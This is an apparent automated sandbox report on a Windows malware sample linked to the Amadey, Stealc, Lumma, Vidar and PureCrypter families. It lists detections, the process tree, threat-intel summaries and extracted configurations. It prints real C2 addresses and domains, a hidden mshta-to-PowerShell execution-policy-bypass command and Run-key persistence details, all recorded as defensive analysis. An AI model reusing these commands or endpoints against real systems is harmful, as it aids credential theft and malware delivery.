Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1554046
MD5:	a12c379025757cc07db3a875813f8b1e
SHA1:	f6ef51d787cf590dce1d9f2b1cb66d4794eeb89e
SHA256:	6515d31657b9961bb6b8bf78f59a27925e6bbdefee8b91c51d4133c9aea703e1
Tags:	exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Creates HTML files with .exe extension (expired dropper behavior)

Creates multiple autostart registry keys

Detected PureCrypter Trojan

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: MSHTA Suspicious Execution 01

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a global mouse hook

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wscript Shell Run In CommandLine

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3724 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A12C379025757CC07DB3A875813F8B1E)

chrome.exe (PID: 2676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 5228 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsECAFHIIJJE.exe (PID: 8752 cmdline: "C:\Users\user\DocumentsECAFHIIJJE.exe" MD5: B4DF44B9A693D554AD3FCC4F32D5E470)

skotes.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: B4DF44B9A693D554AD3FCC4F32D5E470)

msedge.exe (PID: 7792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8376 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8448 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 9164 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: B4DF44B9A693D554AD3FCC4F32D5E470)

file1.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe" MD5: FC29E2A6DEBBB8C620CD719369DE7F9F)

powershell.exe (PID: 8712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

4136f86ac7.exe (PID: 8836 cmdline: "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe" MD5: 238681147F0B917647D5950BA69B9AAE)

3160604f40.exe (PID: 5264 cmdline: "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe" MD5: A12C379025757CC07DB3A875813F8B1E)

skotes.exe (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: B4DF44B9A693D554AD3FCC4F32D5E470)

0ac2a0f3ae.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe" MD5: F6AF95F6A9FA7B7AD15A1A6944A12A18)

mshta.exe (PID: 4160 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 8996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

4136f86ac7.exe (PID: 9108 cmdline: "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe" MD5: 238681147F0B917647D5950BA69B9AAE)

3160604f40.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe" MD5: A12C379025757CC07DB3A875813F8B1E)

0ac2a0f3ae.exe (PID: 8472 cmdline: "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe" MD5: F6AF95F6A9FA7B7AD15A1A6944A12A18)

4136f86ac7.exe (PID: 2372 cmdline: "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe" MD5: 238681147F0B917647D5950BA69B9AAE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2879905773.00000000055EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2797964606.0000000001348000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.3287942560.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.2892968437.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2877445648.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3095820288.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3094627589.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2904349240.00000000055EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3094047183.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3096841796.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000014.00000002.2465485176.0000000000721000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000003.3095179623.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.3079259497.0000000001564000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3724	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 3724	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3724	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3724	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file1.exe PID: 1412	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file1.exe PID: 1412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file1.exe PID: 1412	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: powershell.exe PID: 8712	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8712	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x393c36:$b2: ::FromBase64String( 0x393c99:$b2: ::FromBase64String( 0x39640b:$b2: ::FromBase64String( 0x396466:$b2: ::FromBase64String( 0x39ac31:$b2: ::FromBase64String( 0x39ac5f:$b2: ::FromBase64String( 0x39ac93:$b2: ::FromBase64String( 0x375f9:$b3: ::UTF8.GetString( 0x39ae33:$b3: ::UTF8.GetString( 0x2c9e0:$s1: -join 0x2d423:$s1: -join 0x12515f:$s1: -join 0x132234:$s1: -join 0x135606:$s1: -join 0x135cb8:$s1: -join 0x1377a9:$s1: -join 0x1399af:$s1: -join 0x13a1d6:$s1: -join 0x13aa46:$s1: -join 0x13b181:$s1: -join 0x13b1b3:$s1: -join
Process Memory Space: 4136f86ac7.exe PID: 8836	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 8836	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 8836	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 8836	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 8836	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 3160604f40.exe PID: 5264	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 3160604f40.exe PID: 5264	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 9108	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 9108	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 9108	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 9108	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4136f86ac7.exe PID: 9108	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 57 entries

Unpacked PEs

Source	Rule	Description	Author
23.2.skotes.exe.fe0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.skotes.exe.fe0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_8712.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2781:$b2: ::FromBase64String( 0x27e7:$b2: ::FromBase64String( 0xde61:$b2: ::FromBase64String( 0xde90:$b2: ::FromBase64String( 0xdec5:$b2: ::FromBase64String( 0xe0a9:$b3: ::UTF8.GetString( 0xc993:$s1: -join 0xead9:$s1: -join 0xb5:$s4: += 0x110:$s4: += 0x16b:$s4: += 0x1c4:$s4: += 0x21d:$s4: += 0x276:$s4: += 0x2cf:$s4: += 0x328:$s4: += 0x381:$s4: += 0x3da:$s4: += 0x433:$s4: += 0x48c:$s4: += 0x4e5:$s4: +=
amsi64_8996.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: MSHTA Suspicious Execution 01

Source: Process started

Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close"), ProcessId: 4160, ProcessName: mshta.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 9164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4136f86ac7.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

